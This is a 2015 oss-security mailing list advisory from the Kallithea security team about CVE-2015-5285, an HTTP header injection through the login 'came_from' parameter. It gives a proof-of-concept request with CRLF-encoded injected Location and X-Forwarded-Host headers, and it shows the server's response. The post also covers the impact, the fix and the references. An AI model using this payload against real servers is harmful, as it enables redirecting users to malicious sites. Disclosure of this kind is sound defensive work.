Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <560EE54D.3030508@shadura.me>
Date: Fri, 2 Oct 2015 22:13:01 +0200
From: Andrew Shadura <andrew@...dura.me>
To: oss-security@...ts.openwall.com
Subject: CVE-2015-5285: Kallithea: HTTP header injection

HTTP header injection

Synopsis
========

A vulnerability has been found in Kallithea, allowing attackers to inject
arbitrary headers into the server response for certain URLs.

Description
===========

HTTP header injection was possible in login-related code of Kallithea,
allowing
attackers to inject arbitrary headers into the server responses.

The vulnerability affects the `came_from` `GET` parameter.

Example of a malicious request:

    GET
/_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk
HTTP/1.1
    Host: 192.168.0.28:8080
    Content-Length: 0
    Cache-Control: max-age=0
    Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://192.168.0.28:8080
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8
    Cookie:
kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

    HTTP/1.1 302 Found
    Cache-Control: no-cache
    Content-Length: 411
    Content-Type: text/html; charset=UTF-8
    Date: Mon, 21 Sep 2015 13:58:05 GMT
    Location: http://192.168.0.28:8080/_admin/d47b5
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk
    Pragma: no-cache
    Server: waitress

    <html>
     <head>
      <title>302 Found</title>
     </head>
     <body>
      <h1>302 Found</h1>
      The resource was found at <a href="http://192.168.0.28:8080/_admin/1
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
    X-Forwarded-Host: http://zeroscience.mk
    Location: http://zeroscience.mk </a>;
    you should be redirected automatically.


     </body>
    </html>

Impact
======

The bug allows an attacker to override important response headers,
possibly redirecting users
to a malicious website or make other middleware misbehave when it trusts
the response headers.

Resolution
==========

The Kallithea project has fixed this issue in the stable branch. Users
are recommended to
upgrade to the latest 0.3 release.

Affected versions
=================

The issue is present in Kallithea versions before 0.3.

Acknowledgments
===============

Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.

References
==========

[0] Kallithea Project
    <https://kallithea-scm.org/>

[1] CVE-2015-5285
    <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285>

[2] Kallithea: Security Notice CVE-2015-5285
    <https://kallithea-scm.org/security/cve-2015-5285.html>

[3] Mercurial changeset fixing the issue

<https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>

[4] Zero Science Lab
    <http://www.zeroscience.mk/en/>

-- 
Cheers,
  Andrew Shadura
  on behalf of Kallithea Security Team


Download attachment "signature.asc" of type "application/pgp-signature" (474 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.